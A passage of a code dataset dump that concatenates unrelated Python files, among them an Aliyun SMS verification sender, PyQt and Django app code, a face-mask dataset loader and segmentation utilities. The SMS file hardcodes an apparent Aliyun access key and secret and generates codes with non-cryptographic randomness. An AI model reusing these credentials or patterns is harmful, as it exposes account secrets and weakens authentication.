linear_programming_MCMCF([node for node in range(1,num_nodes+1)], [arch for arch in range(num_arches)], [commodity for commodity in range(num_comodities)], arc_cost, single_comodity_capacity, supply,mutual_capacities, start_nodes, end_nodes)\n","repo_name":"AlessandroCavaglia/OC-2023","sub_path":"MCMCF_linear_programming.py","file_name":"MCMCF_linear_programming.py","file_ext":"py","file_size_in_byte":4463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"2378779824","text":"import random\nfrom aliyunsdkcore.client import AcsClient\nfrom aliyunsdkcore.request import CommonRequest\n\n'''发送短信(手机,6位验证码)'''\ndef send_sms(phone, code):\n client = AcsClient('LTAIEx3Gbdbceg2C', 'MsCoWUm3x2iXaIcvtqhQLi9yj6nHxX', 'cn-hangzhou')\n\n code = \"{'code':%s}\" % (code)\n request = CommonRequest()\n request.set_accept_format('json')\n request.set_domain('dysmsapi.aliyuncs.com')\n request.set_method('POST')\n request.set_protocol_type('https') # https | http\n request.set_version('2017-05-25')\n request.set_action_name('SendSms')\n\n request.add_query_param('RegionId', 'cn-hangzhou')\n request.add_query_param('PhoneNumbers', phone)\n request.add_query_param('SignName', '北网实训组')\n request.add_query_param('TemplateCode', 'SMS_165745016')\n request.add_query_param('TemplateParam', code)\n\n response = client.do_action(request) # 开始向手机发送验证码\n # python2: print(response)\n print(str(response, encoding='utf-8'))\n\n return str(response, encoding='utf-8')\n\n# 生成验证码函数\ndef get_code(n=6, alpha=True):\n \"\"\"\n 生成随机验证码\n :param n: 代表生成几位验证码\n :param alpha: True表示生成带有字母的 False不带字母的\n :return:\n \"\"\"\n s = '' # 创建字符串变量,存储生成的验证码\n for i in range(n): # 通过for循环控制验证码位数\n num = random.randint(0, 9) # 生成随机数字0-9\n if alpha: # 需要字母验证码,不用传参,如果不需要字母的,关键字alpha=False\n upper_alpha = chr(random.randint(65, 90)) # chr():将数字转换成对应的ASCII值\n lower_alpha = chr(random.randint(97, 122))\n num = random.choice([num, upper_alpha, lower_alpha])\n # print(s)\n s = s + str(num)\n # print(n)\n return s","repo_name":"long-song/Green_Food","sub_path":"common/code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":1854,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"24328300201","text":"from PyQt5.QtWidgets import QVBoxLayout, QFrame, QHBoxLayout, QLabel, QPushButton\nfrom PyQt5.QtCore import QSize, Qt\nfrom PyQt5.QtGui import QCursor\n\n\nclass UserManagementTable:\n def __init__(self, main_window):\n self.main_window = main_window\n\n def set_table(self, edit_funk, delete_funk, user_company_data):\n profile_role_privilege = {allowed_role[\"role\"] for allowed_role in self.main_window.user_role.children_roles}\n self.main_window.delete_layout(self.main_window.ui.user_manage_clear_frame.layout())\n user_manage_clear_layout = QVBoxLayout(self.main_window.ui.user_manage_clear_frame)\n user_manage_clear_layout.setContentsMargins(0, 0, 0, 0)\n user_manage_clear_layout.setSpacing(0)\n user_manage_clear_layout.setObjectName(\"user_manage_clear_layout\")\n background_gray = True\n for user in user_company_data:\n frame = QFrame(self.main_window.ui.user_manage_clear_frame)\n if background_gray:\n frame.setStyleSheet(\"QFrame {\\n\"\n \" background: #F2F3F6;\\n\"\n \" border-radius: 4px;\\n\"\n \"}\")\n background_gray = not background_gray\n frame.setFrameShape(QFrame.NoFrame)\n frame.setMinimumSize(QSize(0, 54))\n horizontal_layout = QHBoxLayout(frame)\n horizontal_layout.setContentsMargins(0, 0, 0, 0)\n horizontal_layout.setSpacing(0)\n frame_2 = QFrame(frame)\n frame_2.setFrameShape(QFrame.NoFrame)\n horizontal_layout_2 = QHBoxLayout(frame_2)\n horizontal_layout_2.setContentsMargins(17, 0, 0, 0)\n horizontal_layout_2.setSpacing(7)\n icon = QLabel(frame_2)\n icon.setMinimumSize(QSize(20, 20))\n icon.setMaximumSize(QSize(20, 20))\n icon.setStyleSheet(\" image: url(:/image/account_user_manage.svg);\")\n icon.setText(\"\")\n icon.setAlignment(Qt.AlignLeading | Qt.AlignLeft | Qt.AlignVCenter)\n horizontal_layout_2.addWidget(icon)\n fullname = QLabel(frame_2)\n fullname.setStyleSheet(\"color: #070808;\")\n fullname.setText(user[\"fullname\"])\n horizontal_layout_2.addWidget(fullname)\n horizontal_layout.addWidget(frame_2, 0, Qt.AlignLeft)\n email = QLabel(frame)\n email.setStyleSheet(\"color: #4E50FF;\")\n email.setText(user[\"email\"].capitalize())\n horizontal_layout.addWidget(email)\n role = QLabel(frame)\n role.setText(user[\"user_role\"][\"role\"].title())\n horizontal_layout.addWidget(role)\n frame_3 = QFrame(frame)\n frame_3.setFrameShape(QFrame.NoFrame)\n horizontal_layout_3 = QHBoxLayout(frame_3)\n horizontal_layout_3.setContentsMargins(0, 0, 50, 0)\n horizontal_layout_3.setSpacing(10)\n edit_button = QPushButton(frame_3)\n edit_button.setMinimumSize(QSize(24, 24))\n edit_button.setMaximumSize(QSize(24, 24))\n edit_button.setCursor(QCursor(Qt.PointingHandCursor))\n edit_button.setStyleSheet(\"QPushButton {\\n\"\n \" image: url(:/image/edit_icon_default.svg);\\n\"\n \"}\\n\"\n \"\\n\"\n \"QPushButton:hover {\\n\"\n \" image: url(:/image/edit_icon_hover.svg);\\n\"\n \"}\\n\"\n \"\")\n edit_button.setText(\"\")\n edit_button.setIconSize(QSize(24, 24))\n edit_button.clicked.connect(edit_funk(user))\n horizontal_layout_3.addWidget(edit_button)\n delete_button = QPushButton(frame_3)\n delete_button.setMinimumSize(QSize(24, 24))\n delete_button.setMaximumSize(QSize(24, 24))\n delete_button.setCursor(QCursor(Qt.PointingHandCursor))\n delete_button.setStyleSheet(\"QPushButton {\\n\"\n \" image: url(:/image/delete_acc_icon_default.svg);\\n\"\n \"}\\n\"\n \"\\n\"\n \"QPushButton:hover {\\n\"\n \" image: url(:/image/delete_acc_icon_hover.svg);\\n\"\n \"}\")\n delete_button.setText(\"\")\n delete_button.setIconSize(QSize(24, 24))\n delete_button.clicked.connect(delete_funk(user))\n horizontal_layout_3.addWidget(delete_button)\n horizontal_layout.addWidget(frame_3, 0, Qt.AlignRight)\n horizontal_layout.setStretch(0, 4)\n horizontal_layout.setStretch(1, 2)\n horizontal_layout.setStretch(2, 1)\n horizontal_layout.setStretch(3, 1)\n user_manage_clear_layout.addWidget(frame)\n self.disable_button(user, edit_button, delete_button, profile_role_privilege)\n\n def disable_button(self, user, edit_button, delete_button, profile_role_privilege):\n user_role = user[\"user_role\"][\"role\"]\n if user[\"id\"] == self.main_window.user.id:\n delete_button.setEnabled(False)\n delete_button.setStyleSheet(\"image: url(:/image/delete_acc_icon_locked.svg);\")\n elif user_role not in profile_role_privilege:\n delete_button.setEnabled(False)\n delete_button.setStyleSheet(\"image: url(:/image/delete_acc_icon_locked.svg);\")\n edit_button.setEnabled(False)\n edit_button.setStyleSheet(\"image: url(:/image/edit_icon_locked.svg);\")\n","repo_name":"dmitry-vokhmin/Moving_Calc_GUI","sub_path":"view/pages/user_management_table_ui.py","file_name":"user_management_table_ui.py","file_ext":"py","file_size_in_byte":5755,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"15202254714","text":"from django.urls import path, include\nfrom rest_framework.routers import DefaultRouter\n\nfrom .views import ProductViewSet, UnitCreateAPIView, UnitAPIView\n\nrouter = DefaultRouter()\nrouter.register('', ProductViewSet, basename='product')\n\nurlpatterns = [\n path('products/', include(router.urls)),\n path('units/', UnitCreateAPIView.as_view()),\n path('units//', UnitAPIView.as_view()),\n]\n","repo_name":"TamTran72111/store-manager","sub_path":"products/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":401,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"6368647099","text":"from pathlib import Path\nimport typing as tp\n\nimport cv2\nfrom torchvision.transforms import Compose, Normalize, ColorJitter, ToTensor, ToPILImage, RandomApply, RandomHorizontalFlip\nfrom torch.utils.data import Dataset\n\n\ndef transforms():\n return Compose([\n ToPILImage(),\n RandomHorizontalFlip(),\n RandomApply([ColorJitter(0.05, 0.05, 0.05)], p=0.5),\n ToTensor(),\n Normalize((0.485, 0.456, 0.406), (0.229, 0.224, 0.225)),\n ])\n\n\ndef test_transforms():\n return Compose([\n ToTensor(),\n Normalize((0.485, 0.456, 0.406), (0.229, 0.224, 0.225)),\n ])\n\n\nclass LFWDataset(Dataset):\n OPEN_FACE_DIR_NAME = \"LFW_without_Mask/LFW_without_Mask\"\n MASKED_FACE_DIR_NAME = \"Masked_LFW_Dataset/Masked_LFW_Dataset\"\n\n def __init__(self, path: str, transform: Compose = None) -> None:\n self.root_path = Path(path)\n self.transform = transform\n\n self.face_paths = []\n self.face_is_open = []\n self.face_ids = []\n self.name_to_idx = {}\n\n self._read_data()\n\n def __getitem__(self, idx: int) -> tp.Dict[str, tp.Any]:\n path = self.face_paths[idx]\n img = cv2.imread(path)\n img = cv2.resize(img, (112, 112))\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n if self.transform is not None:\n img = self.transform(img)\n return {\n \"img\": img,\n \"face_type\": self.face_is_open[idx],\n \"face_idx\": self.face_ids[idx],\n \"path\": path\n }\n\n def __len__(self) -> int:\n return len(self.face_paths)\n\n def _read_data(self) -> None:\n open_faces_dir = self.root_path / self.OPEN_FACE_DIR_NAME\n close_face_dir = self.root_path / self.MASKED_FACE_DIR_NAME\n\n for filepath in open_faces_dir.glob(\"./*/*\"):\n if not filepath.is_file():\n continue\n\n person_name = filepath.parent.name\n if person_name not in self.name_to_idx:\n self.name_to_idx[person_name] = len(self.name_to_idx)\n\n self.face_paths.append(str(filepath.absolute()))\n self.face_ids.append(self.name_to_idx[person_name])\n self.face_is_open.append(1)\n\n for filepath in close_face_dir.iterdir():\n if not filepath.is_file():\n continue\n\n person_name = \"_\".join(filepath.name.split(\"_\")[:-1])\n\n self.face_paths.append(str(filepath.absolute()))\n self.face_ids.append(self.name_to_idx[person_name])\n self.face_is_open.append(0)\n\n @property\n def num_classes(self) -> int:\n return len(self.name_to_idx)\n\n\nclass TestDataset(Dataset):\n def __init__(self, paths: tp.List[str], transform: Compose = None) -> None:\n self.paths = paths\n self.transform = transform\n\n def __getitem__(self, idx: int) -> tp.Dict[str, tp.Any]:\n path = self.paths[idx]\n img = cv2.imread(path)\n img = cv2.resize(img, (112, 112))\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n if self.transform is not None:\n img = self.transform(img)\n return {\n \"img\": img,\n \"path\": path\n }\n\n def __len__(self) -> int:\n return len(self.paths)\n\n\nif __name__ == \"__main__\":\n dataset = LFWDataset(\"data\")\n","repo_name":"Serega6678/INF634","sub_path":"src/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":3307,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"70495542334","text":"import numpy as np\nimport torch\nfrom PIL import Image\nfrom sklearn.metrics import pair_confusion_matrix\n\ndef get_coordinate_tensors(x_max, y_max):\n x_map = np.tile(np.arange(x_max), (y_max,1))/x_max*2 - 1.0\n y_map = np.tile(np.arange(y_max), (x_max,1)).T/y_max*2 - 1.0\n\n x_map_tensor = torch.from_numpy(x_map.astype(np.float32)).cuda()\n y_map_tensor = torch.from_numpy(y_map.astype(np.float32)).cuda()\n\n return x_map_tensor, y_map_tensor\n\ndef get_center(part_map, self_referenced=False):\n\n h,w = part_map.shape\n x_map, y_map = get_coordinate_tensors(h,w)\n\n x_center = (part_map * x_map).sum()\n y_center = (part_map * y_map).sum()\n\n if self_referenced:\n x_c_value = float(x_center.cpu().detach())\n y_c_value = float(y_center.cpu().detach())\n x_center = (part_map * (x_map - x_c_value)).sum() + x_c_value\n y_center = (part_map * (y_map - y_c_value)).sum() + y_c_value\n\n return x_center, y_center\n\ndef get_centers(part_maps, detach_k=True, epsilon=1e-3, self_ref_coord=False, yx=False):\n C,H,W = part_maps.shape\n centers = []\n for c in range(C):\n part_map = part_maps[c,:,:] + epsilon\n k = part_map.sum()\n part_map_pdf = part_map/k\n x_c, y_c = get_center(part_map_pdf, self_ref_coord)\n if yx:\n centers.append(torch.stack((y_c, x_c), dim=0).unsqueeze(0))\n else:\n centers.append(torch.stack((x_c, y_c), dim=0).unsqueeze(0))\n return torch.cat(centers, dim=0)\n\ndef batch_get_centers(pred_softmax, yx=False):\n B,C,H,W = pred_softmax.shape\n\n centers_list = []\n for b in range(B):\n centers_list.append(get_centers(pred_softmax[b], yx=yx).unsqueeze(0))\n return torch.cat(centers_list, dim=0)\n\n\ndef batch_get_corners(pred_softmax):\n B,C,H,W = pred_softmax.shape\n\n corners_list1 = []\n corners_list2 = []\n for b in range(B):\n corners_list1.append(get_corners(pred_softmax[b])[0].unsqueeze(0))\n corners_list2.append(get_corners(pred_softmax[b])[1].unsqueeze(0))\n return torch.cat(corners_list1, dim=0), torch.cat(corners_list2, dim=0)\n\n\ndef get_corners(part_maps, detach_k=True, epsilon=1e-3, self_ref_coord=False):\n C,H,W = part_maps.shape\n corners1 = []\n corners2 = []\n for c in range(C):\n part_map = part_maps[c,:,:] + epsilon\n k = part_map.sum()\n part_map_pdf = part_map/k\n x_min, y_min, x_max, y_max = get_corner(part_map_pdf, self_ref_coord)\n corners1.append(torch.stack((x_min, y_min), dim=0).unsqueeze(0))\n corners2.append(torch.stack((x_max, y_max), dim=0).unsqueeze(0))\n return torch.cat(corners1, dim=0), torch.cat(corners2, dim=0)\n\ndef get_corner(part_map, self_referenced=False):\n\n h,w = part_map.shape\n x_map, y_map = get_coordinate_tensors(h,w)\n\n x_min = (part_map * x_map).min()\n y_min = (part_map * y_map).min()\n x_max = (part_map * x_map).max()\n y_max = (part_map * y_map).max()\n\n if self_referenced:\n x_c_value = float(x_center.cpu().detach())\n y_c_value = float(y_center.cpu().detach())\n x_center = (part_map * (x_map - x_c_value)).sum() + x_c_value\n y_center = (part_map * (y_map - y_c_value)).sum() + y_c_value\n\n return x_min, y_min, x_max, y_max\n\n\n\nclass Colorize(object):\n def __init__(self, n=22):\n self.cmap = color_map(n)\n print(self.cmap)\n self.cmap = torch.from_numpy(self.cmap[:n])\n\n def __call__(self, gray_image):\n size = gray_image.shape\n color_image = np.zeros((3, size[0], size[1]), dtype=np.uint8)\n\n for label in range(0, len(self.cmap)):\n mask = (label == gray_image)\n color_image[0][mask] = self.cmap[label][0]\n color_image[1][mask] = self.cmap[label][1]\n color_image[2][mask] = self.cmap[label][2]\n\n # handle void\n mask = (255 == gray_image)\n color_image[0][mask] = color_image[1][mask] = color_image[2][mask] = 255\n\n return color_image\n\ndef color_map(N=256, normalized=False):\n def bitget(byteval, idx):\n return ((byteval & (1 << idx)) != 0)\n\n dtype = 'float32' if normalized else 'uint8'\n cmap = np.zeros((N, 3), dtype=dtype)\n for i in range(N):\n r = g = b = 0\n c = i\n for j in range(8):\n r = r | (bitget(c, 0) << 7-j)\n g = g | (bitget(c, 1) << 7-j)\n b = b | (bitget(c, 2) << 7-j)\n c = c >> 3\n\n cmap[i] = np.array([r, g, b])\n\n cmap = cmap/255 if normalized else cmap\n return cmap\n\ndef denseCRF(img, pred):\n import pydensecrf.densecrf as dcrf\n from pydensecrf.utils import unary_from_softmax\n N,H,W = pred.shape\n\n d = dcrf.DenseCRF2D(W, H, N) # width, height, nlabels\n U = unary_from_softmax(pred)\n d.setUnaryEnergy(U)\n\n d.addPairwiseGaussian(sxy=3, compat=5)\n\n Q = d.inference(5)\n Q = np.array(Q).reshape((N,H,W)).transpose(1,2,0)\n\n return Q\n\n\ndef argmax_onehot(x, dim=1):\n m = torch.argmax(x, dim=dim, keepdim=True)\n x = torch.zeros_like(x, memory_format=torch.legacy_contiguous_format).scatter_(dim, m, 1.0)\n return x\n\ndef _fast_hist(label_true, label_pred, n_class):\n mask = (label_true >= 0) & (label_true < n_class)\n hist = np.bincount(\n n_class * label_true[mask].astype(int) + label_pred[mask],\n minlength=n_class ** 2,\n ).reshape(n_class, n_class)\n return hist\n\n\ndef scores(label_trues, label_preds, n_class, class_names=None):\n hist = np.zeros((n_class, n_class))\n for lt, lp in zip(label_trues, label_preds):\n hist += _fast_hist(lt.flatten(), lp.flatten(), n_class)\n acc = np.diag(hist).sum() / hist.sum()\n acc_cls = np.diag(hist) / hist.sum(axis=1)\n acc_cls = np.nanmean(acc_cls)\n iu = np.diag(hist) / (hist.sum(axis=1) + hist.sum(axis=0) - np.diag(hist))\n valid = hist.sum(axis=1) > 0 # added\n mean_iu = np.nanmean(iu[valid])\n freq = hist.sum(axis=1) / hist.sum()\n fwavacc = (freq[freq > 0] * iu[freq > 0]).sum()\n cls_iu = dict(zip(range(n_class) if class_names is None else class_names, iu))\n\n return {\n \"Pixel Accuracy\": acc,\n \"Mean Accuracy\": acc_cls,\n \"Frequency Weighted IoU\": fwavacc,\n \"Mean IoU\": mean_iu,\n \"Class IoU\": cls_iu,\n }\n\n\ndef adjusted_rand_score_overflow(labels_true, labels_pred):\n (tn, fp), (fn, tp) = pair_confusion_matrix(labels_true, labels_pred)\n\n # Special cases: empty data or full agreement\n if fn == 0 and fp == 0:\n return 1.0\n (tn, fp), (fn, tp) = (tn / 1e4, fp / 1e4), (fn / 1e4, tp / 1e4)\n return 2. * (tp * tn - fn * fp) / ((tp + fn) * (fn + tn) +\n (tp + fp) * (fp + tn))\n\n\ndef seed_worker(id):\n process_seed = torch.initial_seed()\n # Back out the base_seed so we can use all the bits.\n base_seed = process_seed - id\n ss = np.random.SeedSequence([id, base_seed])\n # More than 128 bits (4 32-bit words) would be overkill.\n np.random.seed(ss.generate_state(4))\n\n\ndef pil_loader(path, type):\n with open(path, 'rb') as f:\n img = Image.open(f)\n return img.convert(type)\n\n\ndef pad_if_smaller(img, size, fill=None):\n\n min_size = min(img.shape[:2])\n if min_size < size:\n ow, oh = img.shape[:2]\n padh = size - oh if oh < size else 0\n padw = size - ow if ow < size else 0\n pad = ((padw // 2, padw - padw // 2), (padh // 2, padh - padh // 2), (0,0)) if len(img.shape) == 3 else ((padw // 2, padw - padw // 2), (padh // 2, padh - padh // 2))\n if fill is None:\n img = np.pad(img, pad, 'edge')\n else:\n img = np.pad(img, pad, 'constant', constant_values=fill)\n return img\n\n \n","repo_name":"DeepakSridhar/spask","sub_path":"utils/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":7660,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"73463185536","text":"from __future__ import unicode_literals\nfrom django.db import models\nfrom localflavor.us.models import PhoneNumberField, USStateField, \\\n USZipCodeField\n\n\nclass Customer(models.Model):\n \"\"\"\n This class is the customer database table. It contains a function\n that allows searching of fields.\n \"\"\"\n\n signup_date = models.DateTimeField(auto_now_add=True)\n first_name = models.CharField(max_length=200)\n last_name = models.CharField(max_length=200)\n street_address = models.CharField(max_length=200)\n city = models.CharField(max_length=200)\n state = USStateField()\n zip_code = USZipCodeField()\n primary_phone = PhoneNumberField(blank=True, null=True)\n secondary_phone = PhoneNumberField(blank=True, null=True)\n email = models.EmailField(blank=True, null=True)\n vet_name = models.CharField(max_length=200, blank=True, null=True)\n vet_phone = PhoneNumberField(blank=True, null=True)\n emergency_contact_name = models.CharField(max_length=200,\n blank=True,\n null=True)\n emergency_contact_phone = PhoneNumberField(blank=True, null=True)\n contract_on_file = models.BooleanField()\n left_rating = models.BooleanField()\n allows_pics = models.BooleanField()\n mileage = models.IntegerField()\n notes = models.TextField(blank=True, null=True)\n\n def __str__(self):\n \"\"\"\n This is the text that is returned with the object\n \"\"\"\n\n return '{} {}, {}, {}'.format(self.first_name,\n self.last_name,\n self.primary_phone,\n self.email)\n\n @property\n def full_name(self):\n \"\"\"\n :return: Custom property with the full name.\n \"\"\"\n\n return '{} {}'.format(self.first_name,\n self.last_name)\n\n @staticmethod\n def customer_search(search_query):\n \"\"\"\n Searches the database fields for the search query provided.\n\n :param search_query: str/int: This param is created by\n request.POST and sent through views.py\n :return: Returns a list of objects that contains the search\n query in any of its fields.\n \"\"\"\n\n customers = []\n kwargs = {}\n is_string = False\n\n # Tests the search_query to see if it's an integer or string.\n try:\n search_query = int(search_query)\n except:\n is_string = True\n\n # Manually created dict to define the field type. Either integer\n # or string. Any new fields that need to be included in the\n # search are required to be in this dict.\n fields = {'first_name': 'string',\n 'last_name': 'string',\n 'street_address': 'string',\n 'city': 'string',\n 'state': 'string',\n 'zip_code': 'integer',\n 'primary_phone': 'integer',\n 'secondary_phone': 'integer',\n 'email': 'string',\n 'vet_name': 'string',\n 'vet_phone': 'integer',\n 'emergency_contact_name': 'string',\n 'emergency_contact_phone': 'integer',\n 'mileage': 'integer',\n 'notes': 'string'}\n\n # Builds the dict with the fields of the same data type\n for k, v in fields.items():\n if v == 'string':\n if is_string:\n kwargs.update({k + '__icontains': search_query})\n else:\n continue\n elif v == 'integer':\n if not is_string:\n kwargs.update({k + '__icontains': search_query})\n else:\n continue\n\n # Takes the key:value pair, filters the fields and applies\n # any results to a list of objects.\n for k, v in kwargs.items():\n args = {k: v}\n db_query = Customer.objects.filter(**args)\n customers += list(db_query)\n\n return list(set(customers))\n\n\nclass Pet(models.Model):\n \"\"\"\n This class is the pet database table. It contains a function\n that allows searching of fields.\n \"\"\"\n\n name = models.CharField(max_length=200)\n customer = models.ForeignKey(Customer)\n animal_type = models.CharField(max_length=200)\n\n def __str__(self):\n \"\"\"\n This is the text that is returned with the object\n \"\"\"\n\n return 'Owner: {} {} - ' \\\n 'Pet Name: {} - ' \\\n 'Animal: {}'.format(self.customer.first_name,\n self.customer.last_name,\n self.name,\n self.animal_type)\n\n @staticmethod\n def pet_search(search_query):\n \"\"\"\n Searches the database fields for the search query provided.\n\n :param search_query: str/int: This param is created by\n request.POST and sent through views.py\n :return: Returns a list of objects that contains the search\n query in any of its fields.\n \"\"\"\n\n pets = []\n kwargs = {}\n\n if type(search_query) == int:\n return pets\n\n # Manually created dict to define the field type. Either integer\n # or string. Any new fields that need to be included in the\n # search are required to be in this dict.\n fields = {'name': 'string', 'animal_type': 'string'}\n\n # Builds the dict with the fields of the same data type\n for k, v in fields.items():\n kwargs.update({k + '__icontains': search_query})\n\n # Takes the key:value pair, filters the fields and applies\n # any results to a list of objects.\n for k, v in kwargs.items():\n args = {k: v}\n db_query = Pet.objects.filter(**args)\n pets += list(db_query)\n\n return list(set(pets))\n\n\nclass Service(models.Model):\n \"\"\"\n This class is the service database table. These are the services offered.\n \"\"\"\n\n name = models.CharField(max_length=200)\n price = models.DecimalField(max_digits=10, decimal_places=2)\n\n def __str__(self):\n \"\"\"\n This is the text that is returned with the object\n \"\"\"\n return 'Service: {} - Price: ${}'.format(self.name,\n self.price)\n\n\nclass Order(models.Model):\n \"\"\"\n This class is the order database table. All the order information\n will be stored here.\n \"\"\"\n\n order_date = models.DateTimeField(auto_now_add=True)\n customer = models.ForeignKey(Customer)\n start_date = models.DateField(auto_now=False)\n end_date = models.DateField(auto_now=False)\n total_visits = models.IntegerField(null=True)\n total_mileage = models.IntegerField(null=True, blank=True)\n amount_due = models.DecimalField(max_digits=10,\n decimal_places=2,\n blank=True,\n null=True)\n services = models.ForeignKey(Service, null=True)\n paid = models.BooleanField(default=False)\n\n def __str__(self):\n \"\"\"\n This is the text that is returned with the object\n \"\"\"\n return 'Order Number: {}, ' \\\n 'Customer: {} {}, ' \\\n 'Start Date: {}, ' \\\n 'End Date: {}, ' \\\n 'Amount Due: {}, ' \\\n 'Paid: {}'.format(self.id,\n self.customer.first_name,\n self.customer.last_name,\n self.start_date,\n self.end_date,\n self.amount_due,\n self.paid)\n","repo_name":"dancaps/sps","sub_path":"pet_sitting/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":7875,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"28483177518","text":"import datetime as dt\n\n\ndef convert_to_datetime_format(date_str):\n try:\n # Try to parse the input as \"%Y-%m-%d %H:%M:%S\"\n date = dt.datetime.strptime(date_str, \"%Y-%m-%d %H:%M:%S\")\n except ValueError:\n try:\n # Try to parse the input as \"%Y-%m-%d\" and add time as 00:00:00\n date = dt.datetime.strptime(date_str, \"%Y-%m-%d\")\n except ValueError:\n raise ValueError(\"Invalid date format. Please use either 'YYYY-MM-DD' or 'YYYY-MM-DD HH:MM:SS'.\")\n\n return date\n","repo_name":"ashkanans/data-mining-project","sub_path":"hw1/repo/Problem7/Common.py","file_name":"Common.py","file_ext":"py","file_size_in_byte":526,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"36169438098","text":"import cv2\nimport mediapipe as mp\n\n# Initialize mediapipe holistic model\nmp_face_mesh = mp.solutions.face_mesh\n\nmp_holistic = mp.solutions.holistic\nholistic = mp_holistic.Holistic()\n\nREYE = [\n 33, 7, 163, 144, 145, 153, 154, 155, 133,\n 246, 161, 160, 159, 158, 157, 173,\n][::2]\nLEYE = [\n 263, 249, 390, 373, 374, 380, 381, 382, 362,\n 466, 388, 387, 386, 385, 384, 398,\n][::2]\nNOSE=[\n 1,2,98,327\n]\nSLIP = [\n 78, 95, 88, 178, 87, 14, 317, 402, 318, 324, 308,\n 191, 80, 81, 82, 13, 312, 311, 310, 415,\n]\nPOSE = [\n 11,13,15,12,14,16,23,24,\n]\n\ndef draw_specific_keypoints(image, keypoints, indices, color=(0, 255, 0), radius=3):\n for idx in indices:\n cv2.circle(image, keypoints[idx], radius, color, -1)\n\n# Read the image\nimage = cv2.imread('ok.png')\n# Convert the BGR image to RGB before processing\nresults = holistic.process(cv2.cvtColor(image, cv2.COLOR_BGR2RGB))\n\n# Extract keypoints\nif results.face_landmarks:\n # Convert landmarks to a list of tuples\n keypoints = [(int(landmark.x * image.shape[1]), int(landmark.y * image.shape[0])) for landmark in results.face_landmarks.landmark]\n\n # Draw only the right and left eye keypoints\n draw_specific_keypoints(image, keypoints, REYE, (0, 0, 255)) # Drawing right eye with red color\n draw_specific_keypoints(image, keypoints, LEYE, (0, 255, 0)) # Drawing left eye with green color\n draw_specific_keypoints(image, keypoints, NOSE, (0, 155, 0)) # Drawing left eye with green color\n draw_specific_keypoints(image, keypoints, SLIP, (0, 155, 255)) # Drawing left eye with green color\n\nif results.pose_landmarks:\n keypoints = [(int(landmark.x * image.shape[1]), int(landmark.y * image.shape[0])) for landmark in results.pose_landmarks.landmark]\n draw_specific_keypoints(image, keypoints, POSE, (0, 255, 0)) # Drawing left eye with green color\n\n\n\n\ncv2.imshow(\"Keypoints Image\", image)\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n","repo_name":"asiri1ndatissa/ssl_ml_2023","sub_path":"drawfacekp.py","file_name":"drawfacekp.py","file_ext":"py","file_size_in_byte":1927,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"73755852414","text":"# @.@ coding : utf-8 ^-^\n# @Author : Leon Rein\n# @Time : 2021-03-09 ~ 18:50 \n# @File : 2.parallel_data_64.py\n# @Software : PyCharm\n# @Notice : It's a WINDOWS version!\n# 从原始码元中间插入 DC 置零, 插入前 6 个后 5 个置零的虚拟子载波作为保护,\n# 在下标 -21, -7, 7, 21 处插入导频 3 (当作 1 + i)\n\n\"\"\"\n输入: labels48_test.csv\n\n输出: labels64_test.csv\n 一个 CSV 表格文件, 共 1000 行 64 列, 每一行如下\n 下标 [0:6] 共 6 个为置零子载波, 为 0;\n 下标 [6:11] 共 5 个为数据位置;\n 下标 [11] 是第一个导频, 为 3;\n 下标 [12:25] 共 13 个为数据位置;\n 下标 [25] 是第二个导频, 为 3;\n 下标 [26:32] 共 6 个为数据位置;\n 下标 [32] 为中间直流子载波置零, 为 0;\n 下标 [33:39] 共 6 个为数据位置;\n 下标 [39] 是第三个导频, 为 3;\n 下标 [40:53] 共 13 个为数据位置;\n 下标 [53] 是第四个导频, 为 3;\n 下标 [54:59] 共 5 个为数据位置;\n 下标 [59:64] 共 5 个为置零子载波, 为 0.\n\n labels64_train.npy\n 基本同上, 除了行数为 10000.\n\n labels64_onehot_test.npy\n 1000 行 64*4=256 列; 任意某行的 256 个元素中, 每 4 个为一组 onehot 编码.\n\n labels64_onehot_train.npy\n 基本同上, 除了行数为 10000.\n\n\"\"\"\n\nimport numpy as np\n\noriginal_48_test = np.loadtxt(\"./data_sets/labels48_test.csv\", delimiter=\",\").astype(np.int)\noriginal_64_test = np.zeros(shape=(1000, 64), dtype=np.int)\noriginal_64_test[:, 6:11] = original_48_test[:, 0:5]\noriginal_64_test[:, 11] = 3\noriginal_64_test[:, 12:25] = original_48_test[:, 5:18]\noriginal_64_test[:, 25] = 3\noriginal_64_test[:, 26:32] = original_48_test[:, 18:24]\noriginal_64_test[:, 33:39] = original_48_test[:, 24:30]\noriginal_64_test[:, 39] = 3\noriginal_64_test[:, 40:53] = original_48_test[:, 30:43]\noriginal_64_test[:, 53] = 3\noriginal_64_test[:, 54:59] = original_48_test[:, 43:48]\n\noriginal_48_train = np.load(\"./data_sets/labels48_train.npy\")\noriginal_64_train = np.zeros(shape=(10000, 64), dtype=np.int)\noriginal_64_train[:, 6:11] = original_48_train[:, 0:5]\noriginal_64_train[:, 11] = 3\noriginal_64_train[:, 12:25] = original_48_train[:, 5:18]\noriginal_64_train[:, 25] = 3\noriginal_64_train[:, 26:32] = original_48_train[:, 18:24]\noriginal_64_train[:, 33:39] = original_48_train[:, 24:30]\noriginal_64_train[:, 39] = 3\noriginal_64_train[:, 40:53] = original_48_train[:, 30:43]\noriginal_64_train[:, 53] = 3\noriginal_64_train[:, 54:59] = original_48_train[:, 